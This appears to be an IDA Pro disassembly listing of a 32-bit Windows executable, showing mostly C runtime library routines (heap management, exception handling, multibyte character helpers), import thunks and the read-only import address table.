_xcptlookup:
mov ecx, dword_40A400
mov eax, offset dword_40A380
push esi
loc_4037E5: ; CODE XREF: .text:004037F8�j
cmp [eax], edx
jz short loc_4037FA
lea esi, [ecx+ecx*2]
add eax, 0Ch
lea esi, ds:40A380h[esi*4]
cmp eax, esi
jb short loc_4037E5
loc_4037FA: ; CODE XREF: .text:004037E7�j
lea ecx, [ecx+ecx*2]
lea ecx, ds:40A380h[ecx*4]
cmp eax, ecx
pop esi
jnb short loc_40380D
cmp [eax], edx
jz short locret_40380F
loc_40380D: ; CODE XREF: .text:00403807�j
xor eax, eax
locret_40380F: ; CODE XREF: .text:0040380B�j
retn
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___CppXcptFilter:
mov eax, 0E06D7363h
cmp [esp+4], eax
jnz short loc_403999
push dword ptr [esp+8]
push eax
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403999: ; CODE XREF: .text:0040398A�j
xor eax, eax
retn
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF0 proc near ; CODE XREF: start:loc_401F72�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_408670
call __SEH_prolog
mov [ebp+var_1C], offset dword_408E6C
loc_403E03: ; CODE XREF: sub_403DF0+3C�j
cmp [ebp+var_1C], offset dword_408E6C
jnb short loc_403E2E
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_403E24
call eax
jmp short loc_403E24
; ---------------------------------------------------------------------------
loc_403E1D: ; DATA XREF: .rdata:stru_408670�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403E21: ; DATA XREF: .rdata:stru_408670�o
mov esp, [ebp+ms_exc.old_esp]
loc_403E24: ; CODE XREF: sub_403DF0+27�j
; sub_403DF0+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_403E03
; ---------------------------------------------------------------------------
loc_403E2E: ; CODE XREF: sub_403DF0+1A�j
call __SEH_epilog
retn
sub_403DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void sub_403E34(void)
sub_403E34 proc near ; DATA XREF: __cinit:loc_402E77�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_408680
call __SEH_prolog
mov [ebp+var_1C], offset dword_408E74
loc_403E47: ; CODE XREF: sub_403E34+3C�j
cmp [ebp+var_1C], offset dword_408E74
jnb short loc_403E72
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_403E68
call eax
jmp short loc_403E68
; ---------------------------------------------------------------------------
loc_403E61: ; DATA XREF: .rdata:stru_408680�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403E65: ; DATA XREF: .rdata:stru_408680�o
mov esp, [ebp+ms_exc.old_esp]
loc_403E68: ; CODE XREF: sub_403E34+27�j
; sub_403E34+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_403E47
; ---------------------------------------------------------------------------
loc_403E72: ; CODE XREF: sub_403E34+1A�j
call __SEH_epilog
retn
sub_403E34 endp
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__heap_term:
cmp dword_40B364, 3
jnz short loc_403F55
push ebx
xor ebx, ebx
cmp dword_40B348, ebx
push ebp
mov ebp, ds:dword_40806C
jle short loc_403F43
push esi
mov esi, dword_40B34C
push edi
mov edi, ds:dword_408098
add esi, 0Ch
loc_403F0F: ; CODE XREF: .text:00403F3F�j
push 4000h
push 100000h
push dword ptr [esi]
call edi ; VirtualFree
push 8000h
push 0
push dword ptr [esi]
call edi ; VirtualFree
push dword ptr [esi+4]
push 0
push dword_40B360
call ebp ; RtlFreeHeap
add esi, 14h
inc ebx
cmp ebx, dword_40B348
jl short loc_403F0F
pop edi
pop esi
loc_403F43: ; CODE XREF: .text:00403EFC�j
push dword_40B34C
push 0
push dword_40B360
call ebp ; RtlFreeHeap
pop ebp
pop ebx
loc_403F55: ; CODE XREF: .text:00403EEA�j
push dword_40B360
call ds:dword_408090 ; HeapDestroy
retn
; ---------------------------------------------------------------------------
mov eax, dword_40B360
retn
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION __get_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___sbh_heapmin:
mov eax, dword_40B344
test eax, eax
jz locret_404A09
mov ecx, dword_40B35C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
push 8000h
push ecx
call ds:dword_408098 ; VirtualFree
mov ecx, dword_40B35C
mov eax, dword_40B344
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_40B344
mov eax, [eax+10h]
mov ecx, dword_40B35C
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_40B344
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_40B344
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4049B0
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_40B344
loc_4049B0: ; CODE XREF: .text:004049A5�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_404A02
cmp dword_40B348, 1
jle short loc_404A02
push dword ptr [eax+10h]
push 0
push dword_40B360
call ds:dword_40806C ; RtlFreeHeap
mov eax, dword_40B348
mov edx, dword_40B34C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_40B344
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call _memcpy_0
add esp, 0Ch
dec dword_40B348
loc_404A02: ; CODE XREF: .text:004049B4�j
; .text:004049BD�j
and dword_40B344, 0
locret_404A09: ; CODE XREF: .text:00404940�j
retn
; [00000319 BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_40B064
mov dword_40B064, ecx
retn
; ---------------------------------------------------------------------------
mov eax, dword_40B064
retn
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [00000116 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, off_40A42C
retn
; ---------------------------------------------------------------------------
mov eax, off_40A428
retn
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_40531E. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40530A proc near ; DATA XREF: .rdata:stru_408B98�o
xor eax, eax
inc eax
retn
sub_40530A endp
; =============== S U B R O U T I N E =======================================
sub_40530E proc near ; DATA XREF: .rdata:stru_408B98�o
mov esp, [ebp-18h]
sub_40530E endp ; sp-analysis failed
; [0000000D BYTES: COLLAPSED CHUNK OF FUNCTION sub_40531E. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_40531E. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000095 BYTES: COLLAPSED FUNCTION __aulldvrm. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000005F BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION __open_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [000001F0 BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION unknown_libname_2. PRESS KEYPAD "+" TO EXPAND]
; [000002D0 BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push dword ptr [esp+0Ch]
push 40h
push dword ptr [esp+10h]
push dword ptr [esp+10h]
call __sopen
add esp, 10h
retn
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1
push 0
push dword ptr [esp+0Ch]
call _x_ismbbtype
add esp, 0Ch
retn
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_getSystemCP:
and dword_40B084, 0
cmp eax, 0FFFFFFFEh
jnz short loc_4061E0
mov dword_40B084, 1
jmp ds:dword_4080B8
; ---------------------------------------------------------------------------
loc_4061E0: ; CODE XREF: .text:004061CE�j
cmp eax, 0FFFFFFFDh
jnz short loc_4061F5
mov dword_40B084, 1
jmp ds:dword_4080B4
; ---------------------------------------------------------------------------
loc_4061F5: ; CODE XREF: .text:004061E3�j
cmp eax, 0FFFFFFFCh
jnz short locret_406209
mov eax, dword_40B0EC
mov dword_40B084, 1
locret_406209: ; CODE XREF: .text:004061F8�j
retn
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_40A6A8
jmp short loc_4066E4
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __fptrap. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
align 4
mov ecx, [esp+4]
mov eax, dword_40B0F4
mov dword_40B0F4, ecx
retn
; ---------------------------------------------------------------------------
___buffer_overrun:
push 0
push 1
call ___security_error_handler
; ---------------------------------------------------------------------------
pop ecx
pop ecx
retn
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [0000009F BYTES: COLLAPSED FUNCTION __lseeki64. PRESS KEYPAD "+" TO EXPAND]
; [0000015C BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_strncnt:
mov ecx, [esp+4]
test ecx, ecx
jz short loc_407238
loc_40722D: ; CODE XREF: .text:00407236�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_407239
inc eax
test ecx, ecx
jnz short loc_40722D
loc_407238: ; CODE XREF: .text:0040722B�j
dec ecx
loc_407239: ; CODE XREF: .text:00407231�j
mov eax, [esp+4]
sub eax, ecx
dec eax
retn
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp _atol
; [00000079 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__chvalidator:
mov eax, [esp+4]
mov ecx, off_40A428
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+8]
retn
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 2
jmp ds:dword_408000
; ---------------------------------------------------------------------------
jmp ds:dword_408004
; ---------------------------------------------------------------------------
jmp ds:dword_408008
; ---------------------------------------------------------------------------
jmp ds:dword_40800C
; ---------------------------------------------------------------------------
jmp ds:dword_408010
; ---------------------------------------------------------------------------
jmp ds:dword_408014
; ---------------------------------------------------------------------------
jmp ds:dword_408018
; ---------------------------------------------------------------------------
jmp ds:dword_40801C
; ---------------------------------------------------------------------------
jmp ds:dword_408020
; ---------------------------------------------------------------------------
jmp ds:dword_408024
; ---------------------------------------------------------------------------
jmp ds:dword_408028
; ---------------------------------------------------------------------------
jmp ds:dword_40802C
; ---------------------------------------------------------------------------
jmp ds:dword_408030
; ---------------------------------------------------------------------------
jmp ds:dword_408034
; ---------------------------------------------------------------------------
jmp ds:dword_408038
; ---------------------------------------------------------------------------
jmp ds:dword_40803C
; ---------------------------------------------------------------------------
jmp ds:dword_408040
; ---------------------------------------------------------------------------
jmp ds:dword_408044
; ---------------------------------------------------------------------------
jmp ds:dword_408048
; ---------------------------------------------------------------------------
jmp ds:dword_40804C
; ---------------------------------------------------------------------------
jmp ds:dword_408050
; ---------------------------------------------------------------------------
jmp ds:dword_408054
; ---------------------------------------------------------------------------
jmp ds:dword_408058
; ---------------------------------------------------------------------------
jmp ds:dword_40805C
; ---------------------------------------------------------------------------
jmp ds:dword_408060
; ---------------------------------------------------------------------------
jmp ds:dword_408064
; ---------------------------------------------------------------------------
jmp ds:dword_408068
; ---------------------------------------------------------------------------
jmp ds:dword_40806C
; ---------------------------------------------------------------------------
jmp ds:dword_408070
; ---------------------------------------------------------------------------
jmp ds:dword_408074
; ---------------------------------------------------------------------------
jmp ds:dword_408078
; ---------------------------------------------------------------------------
jmp ds:dword_40807C
; ---------------------------------------------------------------------------
jmp ds:dword_408080
; ---------------------------------------------------------------------------
jmp ds:dword_408084
; ---------------------------------------------------------------------------
jmp ds:dword_408088
; ---------------------------------------------------------------------------
jmp ds:dword_40808C
; ---------------------------------------------------------------------------
jmp ds:dword_408090
; ---------------------------------------------------------------------------
jmp ds:dword_408094
; ---------------------------------------------------------------------------
jmp ds:dword_408098
; ---------------------------------------------------------------------------
jmp ds:dword_40809C
; ---------------------------------------------------------------------------
jmp ds:dword_4080A0
; ---------------------------------------------------------------------------
jmp ds:dword_4080A4
; ---------------------------------------------------------------------------
jmp ds:dword_4080A8
; ---------------------------------------------------------------------------
jmp ds:dword_4080AC
; ---------------------------------------------------------------------------
jmp ds:dword_4080B0
; ---------------------------------------------------------------------------
jmp ds:dword_4080B4
; ---------------------------------------------------------------------------
jmp ds:dword_4080B8
; ---------------------------------------------------------------------------
jmp ds:dword_4080BC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E76 proc near ; CODE XREF: __global_unwind2+13�p
jmp ds:dword_4080C0
sub_407E76 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4080C4
; ---------------------------------------------------------------------------
jmp ds:dword_4080C8
; ---------------------------------------------------------------------------
jmp ds:dword_4080CC
; ---------------------------------------------------------------------------
jmp ds:dword_4080D0
; ---------------------------------------------------------------------------
jmp ds:dword_4080D4
; ---------------------------------------------------------------------------
jmp ds:dword_4080D8
; ---------------------------------------------------------------------------
jmp ds:dword_4080DC
; ---------------------------------------------------------------------------
jmp ds:dword_4080E0
; ---------------------------------------------------------------------------
jmp ds:dword_4080E4
; ---------------------------------------------------------------------------
jmp ds:dword_4080E8
; ---------------------------------------------------------------------------
jmp ds:dword_4080EC
; ---------------------------------------------------------------------------
jmp ds:dword_4080F0
; ---------------------------------------------------------------------------
jmp ds:dword_4080F4
; ---------------------------------------------------------------------------
jmp ds:dword_4080F8
; ---------------------------------------------------------------------------
jmp ds:dword_4080FC
; ---------------------------------------------------------------------------
jmp ds:dword_408100
; ---------------------------------------------------------------------------
jmp ds:dword_408104
_text ends
; Section 2. (virtual address 00008000)
; Virtual size : 00001452 ( 5202.)
; Section size in file : 00001452 ( 5202.)
; Offset to raw data for section: 00008000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 408000h
dword_408000 dd 77E7F01Ah ; DATA XREF: sub_4013B9+80�r
; .text:00407D56�r
dword_408004 dd 77E61A54h ; DATA XREF: sub_4013B9+78�r
; .text:00407D5C�r
dword_408008 dd 77E97F16h ; DATA XREF: sub_4013B9+5C�r
; .text:00407D62�r
dword_40800C dd 77E61BB8h ; DATA XREF: sub_4013B9+45�r
; .text:00407D68�r
dword_408010 dd 77E7A099h ; DATA XREF: sub_4013B9+28�r
; WinMain(x,x,x,x)+18�r ...
dword_408014 dd 77E616B4h ; DATA XREF: sub_40148D+184�r
; _doexit+1A�r ...
dword_408018 dd 77E6E154h ; DATA XREF: sub_40148D+165�r
; .text:00407D7A�r
dword_40801C dd 77EB9953h ; DATA XREF: sub_40148D+15C�r
; .text:00407D80�r
dword_408020 dd 77E61A90h ; DATA XREF: sub_40148D:loc_401573�r
; .text:00407D86�r
dword_408024 dd 77E7A5FDh ; DATA XREF: sub_40148D+74�r
; unknown_libname_1+15�r ...
dword_408028 dd 77E79F93h ; DATA XREF: sub_40148D+6D�r
; .text:00401E2B�r ...
dword_40802C dd 77E7C4B7h ; DATA XREF: sub_40148D+5B�r
; .text:00407D98�r
dword_408030 dd 77E79824h ; DATA XREF: sub_40148D+37�r
; .text:00407D9E�r
dword_408034 dd 77E7980Ah ; DATA XREF: WinMain(x,x,x,x)+92�r
; ___sbh_alloc_new_region+7E�r ...
dword_408038 dd 77E70396h ; DATA XREF: WinMain(x,x,x,x)+27�r
; .text:00407DAA�r
dword_40803C dd 77E6177Ah ; DATA XREF: start+160�r __ioinit+57�r ...
dword_408040 dd 77E7C938h ; DATA XREF: start:loc_401F8B�r
; .text:00407DB6�r
dword_408044 dd 77E7C657h ; DATA XREF: start+20�r .text:00407DBC�r
dword_408048 dd 77F516F8h ; DATA XREF: __heap_alloc+3E�r
; ___sbh_heap_init+D�r ...
dword_40804C dd 77F5157Dh ; DATA XREF: __read+8E�r __read+158�r ...
dword_408050 dd 77E78B82h ; DATA XREF: __read+84�r __read+14E�r ...
dword_408054 dd 77E75CB5h ; DATA XREF: unknown_libname_1+29�r
; sub_40531E-7�r ...
dword_408058 dd 77E79C90h ; DATA XREF: _doexit+13�r
; .text:00407DDA�r
dword_40805C dd 77E7C931h ; DATA XREF: __ioinit+19C�r
; .text:00407DE0�r
dword_408060 dd 77E79C3Dh ; DATA XREF: __ioinit+157�r
; __NMSG_WRITE+14E�r ...
dword_408064 dd 77E78406h ; DATA XREF: __ioinit+FE�r
; __ioinit+165�r ...
dword_408068 dd 77E78C81h ; DATA XREF: __lseek+43�r
; __lseeki64+52�r ...
dword_40806C dd 77F51597h ; DATA XREF: _free+30�r .text:00403EF6�r ...
dword_408070 dd 77E77963h ; DATA XREF: __close+65�r __sopen+1E4�r ...
dword_408074 dd 77E79D8Ch ; DATA XREF: __NMSG_WRITE+155�r
; __write+F4�r ...
dword_408078 dd 77EB9A84h ; DATA XREF: __XcptFilter+167�r
; .text:00407E0A�r
dword_40807C dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+113�r
; .text:00407E10�r
dword_408080 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_403DA5�r
; .text:00407E16�r
dword_408084 dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
; .text:00407E1C�r
dword_408088 dd 77E79924h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_403D3D�r
; _wctomb+47�r ...
dword_40808C dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
; .text:00407E28�r
dword_408090 dd 77E76E0Bh ; DATA XREF: __heap_init+44�r
; .text:00403F5B�r ...
dword_408094 dd 77E7C726h ; DATA XREF: __heap_init+11�r
; .text:00407E34�r
dword_408098 dd 77E79E34h ; DATA XREF: .text:00403F06�r
; ___sbh_free_block+22F�r ...
dword_40809C dd 77F5722Fh ; DATA XREF: ___sbh_alloc_new_region+27�r
; _realloc+FD�r ...
dword_4080A0 dd 77E73196h ; DATA XREF: ___sbh_heap_check+1B�r
; ___sbh_heap_check+55�r ...
dword_4080A4 dd 77E7FF2Eh ; DATA XREF: __set_osfhnd:loc_4056E4�r
; __free_osfhnd:loc_40575E�r ...
dword_4080A8 dd 77E73FF9h ; DATA XREF: unknown_libname_2+2C�r
; .text:00407E52�r
dword_4080AC dd 77E7A837h ; DATA XREF: __sopen+1CC�r
; .text:00407E58�r
dword_4080B0 dd 77E805D8h ; DATA XREF: ___crtMessageBoxA+18�r
; .text:00407E5E�r
dword_4080B4 dd 77E7A13Fh ; DATA XREF: .text:004061EF�r
; __setmbcp+42�r ...
dword_4080B8 dd 77E6C703h ; DATA XREF: .text:004061DA�r
; __setmbcp+2B�r ...
dword_4080BC dd 77E7849Fh ; DATA XREF: _setSBUpLow+1C�r
; __setmbcp+93�r ...
dword_4080C0 dd 77F6183Eh ; DATA XREF: sub_407E76�r
dword_4080C4 dd 77E775F1h ; DATA XREF: __ValidateEH3RN+131�r
; __ValidateEH3RN+196�r ...
dword_4080C8 dd 77E7F044h ; DATA XREF: __ValidateEH3RN+B3�r
; __resetstkoflw+1A�r ...
dword_4080CC dd 77E802FCh ; DATA XREF: ___security_init_cookie+43�r
; .text:00407E88�r
dword_4080D0 dd 77E7751Ah ; DATA XREF: ___security_init_cookie+37�r
; .text:00407E8E�r
dword_4080D4 dd 77E77CC4h ; DATA XREF: ___security_init_cookie+2F�r
; .text:00407E94�r
dword_4080D8 dd 77E80656h ; DATA XREF: ___security_init_cookie+27�r
; .text:00407E9A�r
dword_4080DC dd 77E6167Bh ; DATA XREF: ___security_init_cookie+1B�r
; .text:00407EA0�r
dword_4080E0 dd 77F522F2h ; DATA XREF: __msize+30�r
; .text:00407EA6�r
dword_4080E4 dd 77E70192h ; DATA XREF: __chsize+104�r
; .text:00407EAC�r
dword_4080E8 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+2C3�r
; ___crtLCMapStringA+344�r ...
dword_4080EC dd 77E77CCEh ; DATA XREF: ___crtLCMapStringA+C0�r
; ___crtLCMapStringA+141�r ...
dword_4080F0 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+27�r
; ___crtLCMapStringA+15B�r ...
dword_4080F4 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+19C�r
; .text:00407EC4�r
dword_4080F8 dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+24�r
; ___crtGetStringTypeA+128�r ...
dword_4080FC dd 77E7513Ch ; DATA XREF: ___ansicp+20�r
; .text:00407ED0�r
dword_408100 dd 77E6169Ah ; DATA XREF: __resetstkoflw+D5�r
; .text:00407ED6�r
dword_408104 dd 77E7C3A5h ; DATA XREF: __resetstkoflw+2B�r
; .text:00407EDC�r
align 10h
; char aFileSizeTooSma[]
aFileSizeTooSma db 'File size too small',0Ah,0 ; DATA XREF: sub_401000+9C�o
